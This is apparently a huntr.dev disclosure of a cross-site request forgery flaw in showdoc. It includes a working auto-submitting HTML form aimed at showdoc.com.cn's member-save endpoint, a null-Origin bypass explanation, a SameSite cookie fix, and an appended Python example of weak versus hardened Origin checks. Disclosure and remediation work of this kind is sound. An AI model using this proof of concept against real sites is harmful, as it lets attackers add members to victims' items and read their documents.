History: Sep 06, 2021 - 10:18 a.m.

Cross-Site Request Forgery (CSRF) in star7th/showdoc

2021-09-06 10:18:48
amammad
www.huntr.dev

EPSS: 0.001 (Low)

Percentile: 31.2%

✍️ Description

Through this CSRF vulnerability, an attacker is able to add any member to any item if a logged-in user visits the attacker's website.

The existing CSRF protection can be bypassed: if the payload is placed in an iframe or a standalone HTML file and sent to the victim, the browser sends the request with the Origin header set to null, and the CSRF protection does not reject it.

🕵️‍♂️ Proof of Concept

1. Open PoC.html in Firefox or Safari.

2. Now you can check that the member with the email address test (an account that must already be registered) has access to the item with id 1531601670203340.

// PoC.html

<html>
  <body>
    <!-- Rewrite the displayed URL so the page appears to live at "/" -->
    <script>history.pushState('', '', '/')</script>
    <!-- Cross-site POST to the member-save endpoint; the browser attaches the
         victim's showdoc session cookie because no SameSite attribute is set -->
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/save" method="POST">
      <input type="hidden" name="item_id" value="1531601670203344" />
      <input type="hidden" name="username" value="test" />
      <input type="hidden" name="cat_id" value="0" />
      <input type="hidden" name="member_group_id" value="0" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- Submit the form automatically when the page loads -->
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

💥 Impact

This vulnerability is capable of revealing any item.

Fix

Set the SameSite attribute of the session cookies to Lax or Strict.
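The following is an added example, not showdoc's own code: it contrasts a server-side Origin check that tolerates the literal value null (the gap the PoC relies on) with a hardened check, and builds the Set-Cookie line for the SameSite fix. The hostname app.example, the cookie name and the sample requests are assumptions constructed for the example.

```python
"""Added example (not showdoc's code): an Origin check that accepts "null"
versus a hardened one, plus the SameSite cookie fix from the advisory.
Assumptions (constructed): the app is served from https://app.example and
the CSRF defence compares the Origin header against that host."""

from urllib.parse import urlparse

TRUSTED_ORIGINS = {"https://app.example"}
SESSION_COOKIE_NAME = "session"  # placeholder; real cookie name is an assumption


def weak_origin_check(headers: dict) -> bool:
    """Flawed check: rejects mismatching origins but waves through a missing
    header or the literal "null" that browsers send for sandboxed iframes
    and pages opened from a local .html file."""
    origin = headers.get("Origin")
    if origin is None or origin == "null":
        return True  # the gap the advisory's PoC exploits
    return origin in TRUSTED_ORIGINS


def hardened_origin_check(headers: dict) -> bool:
    """Accept only when Origin (or, failing that, Referer) parses to a trusted
    scheme+host. "null", absent and unparsable values all fail closed."""
    candidate = headers.get("Origin") or headers.get("Referer")
    if not candidate or candidate == "null":
        return False
    parsed = urlparse(candidate)
    if parsed.scheme != "https" or not parsed.netloc:
        return False
    return f"{parsed.scheme}://{parsed.netloc}" in TRUSTED_ORIGINS


def session_cookie_header(value: str) -> str:
    """Set-Cookie line for the advisory's fix: with SameSite=Lax the browser
    omits the cookie on cross-site POSTs such as the PoC form, so the request
    arrives unauthenticated regardless of how Origin is handled."""
    return (f"Set-Cookie: {SESSION_COOKIE_NAME}={value}; Path=/; "
            "Secure; HttpOnly; SameSite=Lax")


# Constructed sample requests: legitimate, cross-site, and the null-Origin case.
SAMPLES = {
    "same_site": {"Origin": "https://app.example"},
    "cross_site": {"Origin": "https://attacker.example"},
    "null_origin": {"Origin": "null"},  # iframe / local .html PoC
    "no_origin": {},
}


def evaluate(check) -> dict:
    """Map each sample name to whether the given check accepts it."""
    return {name: check(hdrs) for name, hdrs in SAMPLES.items()}
```

Running evaluate against both checks shows the weak variant accepting the null_origin and no_origin samples while the hardened variant rejects them.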

